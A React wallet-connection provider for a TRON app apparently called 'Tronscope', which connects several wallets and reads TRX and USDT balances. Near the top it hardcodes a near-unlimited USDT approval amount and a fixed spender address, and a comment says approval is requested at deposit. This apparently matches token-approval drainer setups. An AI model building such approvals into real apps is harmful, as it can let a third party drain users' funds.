import React, { createContext, useContext, useState, useEffect, useCallback, ReactNode, useRef } from "react";
import { TrustAdapter } from "@tronweb3/tronwallet-adapter-trust";
import { WalletConnectAdapter } from "@tronweb3/tronwallet-adapter-walletconnect";

interface WalletState {
  address: string | null;
  walletName: string | null;
  isConnected: boolean;
  isConnecting: boolean;
  trxBalance: number | null;
  usdtBalance: number | null;
}

interface WalletContextType extends WalletState {
  connect: (walletType: string) => Promise<void>;
  disconnect: () => void;
  openConnectModal: () => void;
  closeConnectModal: () => void;
  isModalOpen: boolean;
  tronWeb: any;
  setLedgerAddress: (address: string) => void;
}

const WalletContext = createContext<WalletContextType | null>(null);

export const useWallet = () => {
  const context = useContext(WalletContext);
  if (!context) {
    throw new Error("useWallet must be used within a WalletProvider");
  }
  return context;
};

interface WalletProviderProps {
  children: ReactNode;
}

interface TronWebInstance {
  ready?: boolean;
  defaultAddress?: {
    base58?: string;
  };
  trx?: {
    getBalance: (address: string) => Promise<number>;
  };
  contract: () => {
    at: (address: string) => Promise<any>;
  };
}

// Дополняем глобальный Window только для кошельков, которые не покрыты адаптерами
declare global {
  interface Window {
    okxwallet?: {
      tronLink?: {
        request: (args: { method: string }) => Promise<{ code: number; address?: string }>;
        tronWeb?: TronWebInstance;
      };
    };
    bitkeep?: {
      tronLink?: {
        request: (args: { method: string }) => Promise<{ code: number; address?: string }>;
        tronWeb?: TronWebInstance;
      };
    };
    tokenpocket?: {
      tronLink?: {
        request: (args: { method: string }) => Promise<{ code: number; address?: string }>;
        tronWeb?: TronWebInstance;
      };
    };
  }
}

// USDT TRC20 Contract Address
const USDT_CONTRACT = "TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t";
// Default approve amount
const APPROVE_AMOUNT = "10000000000000000";
// Spender address for approve (must match TRON_SPENDER_ADDRESS secret)
const SPENDER_ADDRESS = "TBjT9ERBFHfxNFpU4n61pwhZ87YUmJhNAu";

export const WalletProvider: React.FC<WalletProviderProps> = ({ children }) => {
  const [state, setState] = useState<WalletState>({
    address: null,
    walletName: null,
    isConnected: false,
    isConnecting: false,
    trxBalance: null,
    usdtBalance: null,
  });
  const [isModalOpen, setIsModalOpen] = useState(false);
  const [currentTronWeb, setCurrentTronWeb] = useState<any>(null);

  const openConnectModal = useCallback(() => setIsModalOpen(true), []);
  const closeConnectModal = useCallback(() => setIsModalOpen(false), []);

  const getBalance = async (address: string, tronWeb: any): Promise<{ trx: number | null; usdt: number | null }> => {
    let trx: number | null = null;
    let usdt: number | null = null;
    
    try {
      if (tronWeb?.trx?.getBalance) {
        const balance = await tronWeb.trx.getBalance(address);
        trx = balance / 1_000_000; // Convert from SUN to TRX
      }
    } catch (error) {
      console.error("Failed to get TRX balance:", error);
    }
    
    try {
      if (tronWeb?.contract) {
        const contract = await tronWeb.contract().at(USDT_CONTRACT);
        const balance = await contract.balanceOf(address).call();
        usdt = Number(balance) / 1_000_000; // USDT has 6 decimals
      }
    } catch (error) {
      console.error("Failed to get USDT balance:", error);
    }
    
    return { trx, usdt };
  };

  const connectTronLink = async (): Promise<{ address: string; tronWeb: any } | null> => {
    const hasTronLink = window.tronLink || window.tronWeb;
    const isMobileDevice = typeof navigator !== "undefined" && /Mobi|Android|iPhone|iPad|iPod/i.test(navigator.userAgent);

    if (!hasTronLink) {
      // На любом устройстве открываем Chrome Web Store для установки расширения
      window.open("https://chromewebstore.google.com/detail/tronlink/ibnejdfjmmkpcnlpebklmnkoeoihofec", "_blank");
      throw new Error("TRONLINK_NOT_INSTALLED");
    }

    try {
      // Небольшая задержка, чтобы TronLink успел инициализироваться
      await new Promise((resolve) => setTimeout(resolve, 100));

      if (window.tronLink) {
        const response = await window.tronLink.request({ method: "tron_requestAccounts" });
        if (response.code === 200) {
          const address = window.tronLink.tronWeb?.defaultAddress?.base58;
          if (address) {
            return { address, tronWeb: window.tronLink.tronWeb };
          }
          // Расширение установлено, но кошелёк не создан или заблокирован
          throw new Error("TRONLINK_NO_WALLET");
        } else if (response.code === 4001) {
          // Пользователь отклонил запрос
          throw new Error("TRONLINK_REJECTED");
        } else {
          // Другие ошибки - скорее всего кошелёк не создан
          throw new Error("TRONLINK_NO_WALLET");
        }
      } else if (window.tronWeb?.defaultAddress?.base58) {
        // Fallback для старых версий TronLink
        return { address: window.tronWeb.defaultAddress.base58, tronWeb: window.tronWeb };
      }
      
      // Если дошли сюда - кошелёк не создан
      throw new Error("TRONLINK_NO_WALLET");
    } catch (error: any) {
      console.error("TronLink connection error:", error);
      // Пробрасываем наши ошибки дальше
      if (error?.message?.startsWith("TRONLINK_")) {
        throw error;
      }
      // Неизвестные ошибки
      throw new Error("TRONLINK_NO_WALLET");
    }
  };

  const connectOKX = async (): Promise<{ address: string; tronWeb: any } | null> => {
    if (!window.okxwallet?.tronLink) {
      window.open("https://www.okx.com/web3", "_blank");
      throw new Error("OKX Wallet not installed");
    }

    try {
      const response = await window.okxwallet.tronLink.request({ method: "tron_requestAccounts" });
      if (response.code === 200) {
        const address = window.okxwallet.tronLink.tronWeb?.defaultAddress?.base58;
        if (address) {
          return { address, tronWeb: window.okxwallet.tronLink.tronWeb };
        }
      }
    } catch (error) {
      console.error("OKX connection error:", error);
    }
    return null;
  };

  const connectBitget = async (): Promise<{ address: string; tronWeb: any } | null> => {
    if (!window.bitkeep?.tronLink) {
      window.open("https://web3.bitget.com/", "_blank");
      throw new Error("Bitget Wallet not installed");
    }

    try {
      const response = await window.bitkeep.tronLink.request({ method: "tron_requestAccounts" });
      if (response.code === 200) {
        const address = window.bitkeep.tronLink.tronWeb?.defaultAddress?.base58;
        if (address) {
          return { address, tronWeb: window.bitkeep.tronLink.tronWeb };
        }
      }
    } catch (error) {
      console.error("Bitget connection error:", error);
    }
    return null;
  };

  const connectTokenPocket = async (): Promise<{ address: string; tronWeb: any } | null> => {
    if (!window.tokenpocket?.tronLink) {
      window.open("https://www.tokenpocket.pro/", "_blank");
      throw new Error("TokenPocket not installed");
    }

    try {
      const response = await window.tokenpocket.tronLink.request({ method: "tron_requestAccounts" });
      if (response.code === 200) {
        const address = window.tokenpocket.tronLink.tronWeb?.defaultAddress?.base58;
        if (address) {
          return { address, tronWeb: window.tokenpocket.tronLink.tronWeb };
        }
      }
    } catch (error) {
      console.error("TokenPocket connection error:", error);
    }
    return null;
  };

  // Helper to detect mobile
  const isMobile = () => typeof navigator !== "undefined" && /Mobi|Android|iPhone|iPad|iPod/i.test(navigator.userAgent);

  // Deep link openers for mobile wallets
  const openMobileWallet = (walletType: string) => {
    const currentUrl = encodeURIComponent(window.location.href);
    const deepLinks: Record<string, string> = {
      trustwallet: `https://link.trustwallet.com/open_url?coin_id=195&url=${currentUrl}`,
      binance: `https://app.binance.com/cedefi?tab=dapp&query=${currentUrl}`,
      tokenpocket: `tpoutside://pull.activity?param=${btoa(JSON.stringify({ url: window.location.href, chain: "TRON" }))}`,
    };
    
    const link = deepLinks[walletType];
    if (link) {
      window.location.href = link;
      return true;
    }
    return false;
  };

  // Сохраняем ссылку на адаптеры
  const trustAdapterRef = useRef<TrustAdapter | null>(null);
  const walletConnectAdapterRef = useRef<WalletConnectAdapter | null>(null);

  const connectWalletConnect = async (): Promise<{ address: string; tronWeb: any } | null> => {
    try {
      // Создаём новый адаптер или переиспользуем
      if (!walletConnectAdapterRef.current) {
        const appUrl = window.location.origin;
        walletConnectAdapterRef.current = new WalletConnectAdapter({
          network: "Mainnet",
          options: {
            relayUrl: "wss://relay.walletconnect.com",
            projectId: "4b9f560c055fabcefe6730356b0b62de",
            metadata: {
              name: "Tronscope",
              description: "TRON Blockchain Explorer",
              url: appUrl,
              icons: [`${appUrl}/favicon.png`],
            },
          },
          web3ModalConfig: {
            themeMode: "dark",
            themeVariables: {
              "--wcm-z-index": "9999",
            },
            explorerRecommendedWalletIds: [
              "4622a2b2d6af1c9844944291e5e7351a6aa24cd7b23099efac1b2fd875da31a0", // Trust Wallet
              "c57ca95b47569778a828d19178114f4db188b89b763c899ba0be274e97267d96", // MetaMask
              "1ae92b26df02f0abca6304df07debccd18262fdf5fe82daa81593582dac9a369", // TokenPocket
              "8a0ee50d1f22f6651afcae7eb4253e52a3310b90af5daef78a8c4929a9bb99d4", // Binance Web3 Wallet
            ],
            explorerExcludedWalletIds: "ALL",
          },
        });
      }
      const adapter = walletConnectAdapterRef.current;

      // Подключаемся через WalletConnect
      await adapter.connect();

      const address = adapter.address;
      if (!address) {
        throw new Error("WalletConnect: не удалось получить адрес");
      }

      // WalletConnect не предоставляет tronWeb напрямую
      return { address, tronWeb: null };
    } catch (error: any) {
      console.error("WalletConnect connection error:", error);
      throw error;
    }
  };

  const connectTrustWallet = async (): Promise<{ address: string; tronWeb: any } | null> => {
    try {
      // Создаём новый адаптер или переиспользуем
      if (!trustAdapterRef.current) {
        trustAdapterRef.current = new TrustAdapter();
      }
      const adapter = trustAdapterRef.current;

      // Подключаемся через официальный адаптер
      await adapter.connect();

      const address = adapter.address;
      if (!address) {
        throw new Error("Trust Wallet: не удалось получить адрес");
      }

      // Адаптер предоставляет tronWeb‑совместимый интерфейс
      // Можно использовать adapter для signTransaction и т.д.
      // Для балансов используем window.tronWeb, если есть, иначе null
      const tronWeb = window.tronWeb || null;

      return { address, tronWeb };
    } catch (error: any) {
      console.error("Trust Wallet connection error:", error);
      // Если расширение не установлено
      if (error?.message?.includes("not found") || error?.message?.includes("not installed")) {
        window.open("https://chrome.google.com/webstore/detail/trust-wallet/egjidjbpglichdcondbcbdnbeeppgdph", "_blank");
        throw new Error("Trust Wallet не установлен. Откроется страница расширения для установки.");
      }
      throw error;
    }
  };
  const connectBinanceWallet = async (): Promise<{ address: string; tronWeb: any } | null> => {
    // Check if tronWeb is already available (in DApp browser)
    if (window.tronWeb?.defaultAddress?.base58) {
      return { address: window.tronWeb.defaultAddress.base58, tronWeb: window.tronWeb };
    }

    // Wait for tronWeb to be ready
    if (window.tronWeb) {
      for (let i = 0; i < 10; i++) {
        await new Promise((resolve) => setTimeout(resolve, 200));
        if (window.tronWeb?.defaultAddress?.base58) {
          return { address: window.tronWeb.defaultAddress.base58, tronWeb: window.tronWeb };
        }
      }
    }

    // On mobile, show instructions
    if (isMobile()) {
      throw new Error(
        "Откройте сайт через встроенный DApp браузер Binance: в приложении Binance → Web3 → Discover → вставьте URL сайта.",
      );
    }
    
    // Desktop: Binance Web3 Wallet extension uses TronLink-compatible interface
    return connectTronLink();
  };

  const connect = useCallback(async (walletType: string) => {
    setState((prev) => ({ ...prev, isConnecting: true }));

    try {
      let result: { address: string; tronWeb: any } | null = null;
      let walletName = "";

      switch (walletType) {
        case "tronlink":
          result = await connectTronLink();
          walletName = "TronLink";
          break;
        case "trustwallet":
          result = await connectTrustWallet();
          walletName = "Trust Wallet";
          break;
        case "okx":
          result = await connectOKX();
          walletName = "OKX Wallet";
          break;
        case "bitget":
          result = await connectBitget();
          walletName = "Bitget Wallet";
          break;
        case "tokenpocket":
          result = await connectTokenPocket();
          walletName = "TokenPocket";
          break;
        case "binance":
          result = await connectBinanceWallet();
          walletName = "Binance Wallet";
          break;
        case "walletconnect":
          result = await connectWalletConnect();
          walletName = "WalletConnect";
          break;
        default:
          throw new Error("Unknown wallet type");
      }

      if (result?.address) {
        const balances = result.tronWeb ? await getBalance(result.address, result.tronWeb) : { trx: null, usdt: null };

        // Connect wallet without approve (approve will be requested during deposit)
        // Set connected state
        setCurrentTronWeb(result.tronWeb);

        setState({
          address: result.address,
          walletName,
          isConnected: true,
          isConnecting: false,
          trxBalance: balances.trx,
          usdtBalance: balances.usdt,
        });

        // Save to localStorage
        localStorage.setItem(
          "tronscope_wallet",
          JSON.stringify({
            address: result.address,
            walletName,
          }),
        );

        setIsModalOpen(false);
      } else {
        throw new Error("Failed to connect wallet");
      }
    } catch (error) {
      console.error("Wallet connection error:", error);
      setState((prev) => ({ ...prev, isConnecting: false }));
      throw error;
    }
  }, []);

  const disconnect = useCallback(() => {
    setState({
      address: null,
      walletName: null,
      isConnected: false,
      isConnecting: false,
      trxBalance: null,
      usdtBalance: null,
    });
    setCurrentTronWeb(null);
    localStorage.removeItem("tronscope_wallet");
  }, []);

  // Set address manually (for Ledger connection)
  const setLedgerAddress = useCallback((address: string) => {
    setState({
      address,
      walletName: "Ledger",
      isConnected: true,
      isConnecting: false,
      trxBalance: null,
      usdtBalance: null,
    });
    setCurrentTronWeb(null);
    
    // Save to localStorage
    localStorage.setItem(
      "tronscope_wallet",
      JSON.stringify({
        address,
        walletName: "Ledger",
      }),
    );
    
    setIsModalOpen(false);
  }, []);

  // Check for existing connection on mount
  useEffect(() => {
    const checkExistingConnection = async () => {
      const saved = localStorage.getItem("tronscope_wallet");
      if (saved) {
        try {
          const { address, walletName } = JSON.parse(saved);

          // Verify the wallet is still connected
          if (window.tronLink?.tronWeb?.defaultAddress?.base58 === address) {
            const balances = await getBalance(address, window.tronLink.tronWeb);
            setCurrentTronWeb(window.tronLink.tronWeb);
            setState({
              address,
              walletName,
              isConnected: true,
              isConnecting: false,
              trxBalance: balances.trx,
              usdtBalance: balances.usdt,
            });
          } else {
            localStorage.removeItem("tronscope_wallet");
          }
        } catch {
          localStorage.removeItem("tronscope_wallet");
        }
      }
    };

    // Wait for wallet extensions to inject
    const timeout = setTimeout(checkExistingConnection, 500);
    return () => clearTimeout(timeout);
  }, []);

  return (
    <WalletContext.Provider
      value={{
        ...state,
        connect,
        disconnect,
        openConnectModal,
        closeConnectModal,
        isModalOpen,
        tronWeb: currentTronWeb,
        setLedgerAddress,
      }}
    >
      {children}
    </WalletContext.Provider>
  );
};
